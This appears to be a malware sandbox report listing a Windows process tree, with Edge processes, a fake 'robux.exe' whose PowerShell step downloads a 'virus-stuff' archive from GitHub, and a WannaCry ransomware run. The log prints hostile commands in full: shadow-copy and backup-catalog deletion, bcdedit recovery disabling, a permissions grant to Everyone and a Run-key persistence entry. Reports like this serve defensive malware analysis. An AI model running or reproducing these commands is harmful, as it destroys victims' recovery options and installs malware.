- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5268 /prefetch:1
  2⤵
  PID:5652
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4936 /prefetch:1
  2⤵
  PID:5660
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4100 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5848
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4324 /prefetch:1
  2⤵
  PID:3932
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:1
  2⤵
  PID:1448
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3200 /prefetch:8
  2⤵
  PID:4368
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=4980 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID:3840
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5204 /prefetch:1
  2⤵
  PID:1764
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4416 /prefetch:1
  2⤵
  PID:3580
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1312 /prefetch:1
  2⤵
  PID:556
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6456 /prefetch:1
  2⤵
  PID:1116
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6876 /prefetch:1
  2⤵
  PID:4492
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7124 /prefetch:1
  2⤵
  PID:5588
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6244 /prefetch:8
  2⤵
  PID:5636
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6864 /prefetch:1
  2⤵
  PID:3624
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6872 /prefetch:1
  2⤵
  PID:5536
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7120 /prefetch:1
  2⤵
  PID:524
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6760 /prefetch:1
  2⤵
  PID:4736
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6980 /prefetch:1
  2⤵
  PID:5344
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7044 /prefetch:1
  2⤵
  PID:1924
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1756 /prefetch:1
  2⤵
  PID:5956
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7296 /prefetch:1
  2⤵
  PID:1252
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7316 /prefetch:1
  2⤵
  PID:4876
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7708 /prefetch:1
  2⤵
  PID:5944
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7724 /prefetch:1
  2⤵
  PID:4440
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8176 /prefetch:1
  2⤵
  PID:4468
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7488 /prefetch:1
  2⤵
  PID:4960
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7352 /prefetch:1
  2⤵
  PID:2904
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=8024 /prefetch:8
  2⤵
  PID:6020
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5064 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:644
- C:\Users\Admin\Downloads\robux.exe
  "C:\Users\Admin\Downloads\robux.exe"
  2⤵
  - Executes dropped EXE
  PID:1720
- - C:\Windows\system32\cmd.exe
    "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E4BA.tmp\E4CB.tmp\E4DB.bat C:\Users\Admin\Downloads\robux.exe"
    3⤵
    PID:5284
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "Invoke-WebRequest https://github.com/astrohnugget/virus-stuff/archive/refs/heads/main.zip -outfile robux2.zip"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3336
  - - C:\Windows\system32\timeout.exe
      timeout /t 10 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:3820
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5848 /prefetch:1
  2⤵
  PID:1556
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7476 /prefetch:1
  2⤵
  PID:2936
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3348 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2940

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1232

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1036

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5240

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"
1⤵
- Drops startup file
- Sets desktop wallpaper using registry
PID:6052
- C:\Windows\SysWOW64\attrib.exe
  attrib +h .
  2⤵
  - Views/modifies file attributes
  PID:2728
- C:\Windows\SysWOW64\icacls.exe
  icacls . /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4368
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:2816
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c 103881721304197.bat
  2⤵
  PID:3408
- - C:\Windows\SysWOW64\cscript.exe
    cscript.exe //nologo m.vbs
    3⤵
    PID:5520
- C:\Windows\SysWOW64\attrib.exe
  attrib +h +s F:\$RECYCLE
  2⤵
  - Views/modifies file attributes
  PID:3268
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected] co
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:4856
- - C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exe
    TaskData\Tor\taskhsvc.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    PID:5460
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c start /b @[email protected] vs
  2⤵
  PID:1416
- - C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
    @[email protected] vs
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:4604
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
      4⤵
      PID:5504
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic shadowcopy delete
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5564
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:4080
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:3344
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Sets desktop wallpaper using registry
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SetWindowsHookEx
  PID:4528
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "kcuvipyafvelmp658" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\tasksche.exe\"" /f
  2⤵
  PID:4276
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "kcuvipyafvelmp658" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\tasksche.exe\"" /f
    3⤵
    - Adds Run key to start application
    - Modifies registry key
    PID:4396
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:556
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4420
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:2220
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4936
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:5480
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:5812
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:5180
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:2700
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:5240
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2876
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:4976
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:5892
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:912
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:4332
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:4556
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2392
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:1856
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:5176
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:1036
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:5444
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:1756
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:4652
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:2704
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:2396
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:2156
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:5820
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:3948
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:5812
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:5464
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:5508
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:1768
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:704
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:392
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:2300
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:5708
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:1756
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:5672
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:6128
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:3336
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:5216
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:2136
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:4412
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:2044
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:516
